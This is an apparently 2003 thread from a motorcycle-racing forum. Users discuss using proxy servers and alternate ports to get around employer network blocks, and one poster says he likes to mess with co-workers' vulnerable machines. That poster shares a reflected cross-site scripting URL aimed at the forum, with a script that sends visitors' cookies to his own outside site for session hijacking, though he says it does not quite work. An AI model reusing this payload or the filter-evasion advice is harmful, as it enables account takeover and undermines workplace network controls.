News:

New Round added to ASRA schedule: VIR North Course

Main Menu

OK all you software guru's.......

Started by EX#996, February 27, 2003, 03:36:14 PM

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages 1 2 All
User actions

ecumike

#12
February 28, 2003, 06:21:14 AM
Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

sdiver68

#13
February 28, 2003, 06:43:15 AM
What if your company has ports other than the common ones blocked?  i.e. HTTP, FTP, etc...  then the whole scheme does not work, no?

Also, what happens when the LAN administrator notices a surge in traffic on port 3128?

Not that theyn would typically look for that  :-/
MCRA Race School Instructor

spyderchick

#14
February 28, 2003, 06:53:28 AM
QuoteAwe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  
Alexa Krueger
Spyder Leatherworks
414.327.0967
www.spyderleatherworks.com
www.redflagfund.org
Do or do not, there is no "try".

ecumike

#15
February 28, 2003, 07:18:03 AM
Well, if your employer is REAL tight and the LAN dudes are some of those control freaks, then sure if they also monitor, port 8080, 20, 21, etc.. then yea, you data stream will get picked up by the filter.

But remember... PORT 80 is the default.. they really have no reason to monitor any other port for HTTP traffic, it would just be a crap shoot... there are thousands of PORT.

3128 is an open/non-used port, as is 8080 and ANY port #s not listed below..
7
9
11
13
17
19
20
21
23
25
37
39
42
43
53
67
68
69
70
79
80
88
101
102
107
109
110
111
113
117
119
123
135
137
138
139
143
158
161
162
170
179
194
213
389
443
445
464
500
512
513
513
514
515
517
518
520
525
526
530
531
532
533
540
543
544
550
556
560
561
666
749
750
1109
1167
1433
1434
1434
1512
1524
1701
1723
1812
1813
2049
2053
9535

If don't see a number listed above, you can make it up and use it as a port #... so ya see.. there are too many to filter them all. Also... the ports above are USED by other protocols and programs, it would take a significant amount of server to log/filter all those.

Suppose your CO. blocks Limewire so that employees aren't sucking up bandwith to share and download MP3s. How do they do that?.. They can block the default port that LimeWire uses.. 6344. So what can you do?  Being a smart user, change the port # in the program.

You can make/create/use almost ANY number up to 5 digits. (I think..it's been a few years since I got my MCSE)
So like you could set it to 10443 if you want.

But yea, you're at the 'mercy' of the port that the proxy server that you find uses. If you're admin HAPPENS to block that port.. then just find another server that uses a different port.

ecumike

#16
February 28, 2003, 07:26:37 AM
QuoteWhy do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  


I read it:
A. B/C it really opens your eyes to what people can and are doing through computers
B. It makes you a less naive person when it comes to those sorts things ("oh you can do that?")
C. I'm a Web developer and keep up on the latest and greatest hacks and tricks

OK the real reasons...
A. I like to screw with people/co-workers on the LAN who have vulnerabilities on their systems
B. I like to exploit viruses of those such people and see what I can actually do with their computer
C. It's cool shlt to read about, there's some smart mofo.s out there

Yes, I knew you did leather work.. just didn't know if there was some other work that you did that you read it for.

ecumike

#17
February 28, 2003, 07:57:30 AM
Want to see a prime example...

A cross-site scripting vulneralbility on this here board...
CLICK HERE

Or how's about this...
CLICK HERE

Not to scare anyone, b/c it doesn't EXACTLY work buuuutttt...
This one could send your Cookie info to my site, where it would get tagged in the Web stats log. I could then look it up, and when goto this site (CCS BBS), I could send out YOUR cookie ID instead of mine, and then I'd be logged in as you.

This one isn't working b/c the BBS is not escaping the characters, but here WAS the example...

http://www.racemotorcycles.com/cgi-bin/board/YaBB.pl?board=ccs1;action=display;num=<Script>location%3d'http://santelia.org/index.shtml?Cookie%3d'%2b(document.Cracker)%3b</Script>



OK I'm done playing. :)

spyderchick

#18
February 28, 2003, 09:27:32 AM
Oh Mike, you are such a fart smeller! Gotta love computer "magic".

Yeah, 2600 is fun and informative.  More people should read it. No, I'm not an IT person, but like you, it's good to be informed about the bigger wider world out there. How many people know who Kevin Mitnick is, and would they care?

Alexa Krueger
Spyder Leatherworks
414.327.0967
www.spyderleatherworks.com
www.redflagfund.org
Do or do not, there is no "try".

ecumike

#19
February 28, 2003, 01:35:53 PM
And would you know that he was caught just 15 minutes down the road from where I live.?

spyderchick

#20
March 03, 2003, 06:12:08 AM
There's a little bit of Kevin in all of us.
Alexa Krueger
Spyder Leatherworks
414.327.0967
www.spyderleatherworks.com
www.redflagfund.org
Do or do not, there is no "try".
Print
Go Up Pages 1 2 All
User actions